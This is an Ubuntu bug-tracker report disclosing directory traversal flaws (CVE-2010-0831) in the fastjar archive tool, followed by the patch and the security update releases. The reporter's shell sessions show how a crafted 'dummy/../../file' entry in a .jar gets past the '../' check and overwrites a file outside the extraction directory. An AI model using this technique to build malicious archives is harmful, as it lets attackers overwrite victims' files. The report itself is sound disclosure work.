Ubuntu
fastjar package

Directory traversal vulnerabilities

Bug #540575 reported by Dan Rosenberg
260
This bug affects 1 person
Affects Status Importance Assigned to Milestone
fastjar (Ubuntu)
Fix Released
Medium
Marc Deslauriers
Hardy
Fix Released
Undecided
Unassigned
Jaunty
Fix Released
Undecided
Unassigned
Karmic
Fix Released
Undecided
Unassigned
Lucid
Fix Released
Undecided
Unassigned

Bug Description

Binary package hint: fastjar

The "fastjar" archive utility, installed on my Linux system as "/usr/bin/fastjar", is
vulnerable to directory traversal vulnerabilities. If an attacker can convince
a victim to extract a malicious .jar file, arbitrary files on disk may be
overwritten without prompting.

fastjar attempts to prevent directory traversal, presumably by checking if the
first several characters of a file included in the .jar archive are "../". For
example (my /usr/bin/jar is a symlink to fastjar):

=============================================

drosenbe@Dan:~/jar$ touch ../file
drosenbe@Dan:~/jar$ jar cvf evil.jar ../file
adding: META-INF/ (in=0) (out=0) (stored 0%)
adding: META-INF/MANIFEST.MF (in=56) (out=56) (stored 0%)
adding: ../file (in=129) (out=93) (deflated 27%)
Total:
------
(in = 169) (out = 455) (deflated -169%)
drosenbe@Dan:~/jar$ jar -xvf evil.jar
   created: META-INF/
 extracted: META-INF/MANIFEST.MF
Traversal to parent directories during unpacking!

=============================================

However, this can be subverted by creating a dummy folder and traversing from
there, as follows:

=============================================

drosenbe@Dan:~/jar$ echo "This is an evil file" > ../file
drosenbe@Dan:~/jar$ mkdir dummy
drosenbe@Dan:~/jar$ jar cvf evil.jar dummy/../../file
adding: META-INF/ (in=0) (out=0) (stored 0%)
adding: META-INF/MANIFEST.MF (in=56) (out=56) (stored 0%)
adding: dummy/../../file (in=21) (out=21) (deflated 0%)
Total:
------
(in = 61) (out = 401) (deflated -557%)
drosenbe@Dan:~/jar$ echo "This is a good file" > ../file
drosenbe@Dan:~/jar$ cat ../file
This is a good file
drosenbe@Dan:~/jar$ jar xvf evil.jar
 extracted: META-INF/MANIFEST.MF
  inflated: dummy/../../file
drosenbe@Dan:~/jar$ cat ../file
This is an evil file

=============================================

fastjar also allows the inclusion of full paths as file names, which will be
extracted and overwrite files without prompting. Archive programs such as jar
should take care to ensure that extracted contents remain in the current
directory and do not allow absolute paths or directory traversal, both of which
pose security vulnerabilities.

Please let me know if you have any trouble reproducing this issue or any
questions. I have confirmed that Sun's release of the "jar" utility is also vulnerable
to these issues, and I have contacted their security team.

Tags: patch
Revision history for this message
Marc Deslauriers (mdeslaur) wrote :

Incomplete fix for CVE-2006-3619?

Revision history for this message
Dan Rosenberg (dan-j-rosenberg) wrote :

This does appear to be an incomplete fix for the above issue, but the unpacking of absolute paths seems to be new (and also dangerous).

Kees Cook (kees)
Changed in fastjar (Ubuntu):
status: New → Confirmed
importance: Undecided → Medium
Revision history for this message
Dan Rosenberg (dan-j-rosenberg) wrote :

I've attached a fix for both issues. I've tested the fix thoroughly, confirmed it does not break functionality, and made sure it resolves the vulnerability, even when doing all sorts of tricks with "." and ".." entries in the path of a file added to a .jar archive.

Revision history for this message
Kees Cook (kees) wrote :

CVE-2010-0831, current CRD is 2010-05-25

Kees Cook (kees)
visibility: private → public
Brian Murray (brian-murray)
tags: added: patch
Marc Deslauriers (mdeslaur)
Changed in fastjar (Ubuntu):
assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in fastjar (Ubuntu Hardy):
status: New → Confirmed
Changed in fastjar (Ubuntu Lucid):
status: New → Confirmed
Changed in fastjar (Ubuntu Jaunty):
status: New → Confirmed
Changed in fastjar (Ubuntu Karmic):
status: New → Confirmed
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package fastjar - 2:0.98-1ubuntu0.10.04.1

---------------
fastjar (2:0.98-1ubuntu0.10.04.1) lucid-security; urgency=low

  * SECURITY UPDATE: directory traversal vulnerabilities (LP: #540575)
    - jartool.c (extract_jar): Fix up checks for traversal to parent
      directories, disallow absolute paths, make the code slightly more
      efficient. (patch from trunk)
    - CVE-2010-0831
  * Additional patches from the trunk:
    - jartool.c (read_entries): Properly zero-terminate filename.
    - jartool.c (add_file_to_jar): Fix write return value check.
 -- Marc Deslauriers <email address hidden> Fri, 18 Jun 2010 08:20:03 -0400

Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package fastjar - 2:0.98-1ubuntu0.9.10.1

---------------
fastjar (2:0.98-1ubuntu0.9.10.1) karmic-security; urgency=low

  * SECURITY UPDATE: directory traversal vulnerabilities (LP: #540575)
    - jartool.c (extract_jar): Fix up checks for traversal to parent
      directories, disallow absolute paths, make the code slightly more
      efficient. (patch from trunk)
    - CVE-2010-0831
  * Additional patches from the trunk:
    - jartool.c (read_entries): Properly zero-terminate filename.
    - jartool.c (add_file_to_jar): Fix write return value check.
 -- Marc Deslauriers <email address hidden> Fri, 18 Jun 2010 08:23:57 -0400

Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package fastjar - 2:0.97-3ubuntu0.1

---------------
fastjar (2:0.97-3ubuntu0.1) jaunty-security; urgency=low

  * SECURITY UPDATE: directory traversal vulnerabilities (LP: #540575)
    - jartool.c (extract_jar): Fix up checks for traversal to parent
      directories, disallow absolute paths, make the code slightly more
      efficient. (patch from trunk)
    - CVE-2010-0831
  * Additional patches from the trunk:
    - jartool.c (read_entries): Properly zero-terminate filename.
    - jartool.c (add_file_to_jar): Fix write return value check.
 -- Marc Deslauriers <email address hidden> Fri, 18 Jun 2010 08:35:33 -0400

Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package fastjar - 2:0.95-1ubuntu2.1

---------------
fastjar (2:0.95-1ubuntu2.1) hardy-security; urgency=low

  * SECURITY UPDATE: directory traversal vulnerabilities (LP: #540575)
    - jartool.c (extract_jar): Fix up checks for traversal to parent
      directories, disallow absolute paths, make the code slightly more
      efficient. (patch from trunk)
    - CVE-2010-0831
  * Additional patches from the trunk:
    - jartool.c (read_entries): Properly zero-terminate filename.
 -- Marc Deslauriers <email address hidden> Fri, 18 Jun 2010 08:37:54 -0400

Changed in fastjar (Ubuntu Hardy):
status: Confirmed → Fix Released
Changed in fastjar (Ubuntu Jaunty):
status: Confirmed → Fix Released
Changed in fastjar (Ubuntu Karmic):
status: Confirmed → Fix Released
Changed in fastjar (Ubuntu Lucid):
status: Confirmed → Fix Released
Marc Deslauriers (mdeslaur)
Changed in fastjar (Ubuntu):
status: Confirmed → Fix Released
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.